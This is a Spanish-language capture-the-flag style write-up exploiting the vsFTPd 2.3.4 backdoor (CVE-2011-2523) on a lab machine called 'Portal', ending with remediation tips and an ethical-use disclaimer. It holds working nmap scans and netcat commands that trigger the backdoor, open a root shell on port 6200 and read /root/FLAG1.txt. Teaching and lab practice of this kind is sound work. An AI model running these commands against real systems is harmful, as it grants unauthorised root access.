
Una guía detallada de pruebas de penetración y un informe de explotación para la máquina 'Portal', centrados en CVE-2011-2523 (puerta trasera de vsFTPd 2.3.4) para lograr acceso root.
⚠️ Este proyecto es solo para fines educativos y de pruebas autorizadas.
El acceso no autorizado a sistemas está estrictamente prohibido.
SYAFIQ
Rol: Líder de Pruebas de Penetración
| Fase | Herramienta | Descripción |
|---|---|---|
| Descubrimiento | Nmap | Escanear la red para detectar hosts activos |
| Enumeración | Nmap | Identificar servicios y versiones |
| Análisis | Script NSE | Detectar vulnerabilidad conocida |
| Explotación | Netcat | Activar el backdoor |
| Post-Explotación | Terminal | Obtener acceso root y recuperar la bandera |
Escanear la red para detectar hosts activos:
nmap -sn --unprivileged 10.150.150.10-30
✅ Resultado:
-Se detectaron 8 hosts -Objetivo identificado: 10.150.150.12
Escaneo de puertos y servicios abiertos:
nmap -Pn -F --unprivileged -sV 10.150.150.12
✅ Hallazgos:
-Puerto 21 → FTP (vsftpd) -Puerto 22 → SSH (OpenSSH 8.2p1)
Verificar la vulnerabilidad de backdoor FTP conocida:
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12
🚨 Resultado:
-El objetivo es VULNERABLE -CVE-2011-2523 confirmado
Activación del backdoor usando un nombre de usuario malicioso:
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21
⚡ Esto abre un shell root oculto en el puerto 6200
Conectarse al backdoor y ejecutar comandos:
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200
Acceso root obtenido uid=0(root) confirmado
🏁 Bandera Capturada:
5ee499eb5d0b8e4269b13483e57adaa0b3815f48
Actualizar siempre los servicios obsoletos (vsFTPd era vulnerable) Los servicios mal configurados pueden comprometer todo el sistema Escaneos simples pueden revelar vulnerabilidades críticas -🛡️ Recomendaciones -🔄 Actualizar el servicio FTP a la última versión -🚫 Deshabilitar servicios innecesarios -🔐 Usar un firewall para restringir el acceso -📊 Realizar auditorías de seguridad periódicas -📚 Descargo de responsabilidad
Aprender ciberseguridad Practicar hacking ético Realizar pruebas de penetración autorizadas
❌ NO uses este conocimiento para actividades ilegales.
“La seguridad no es un producto, sino un proceso.” — Siempre prueba, monitorea y mejora.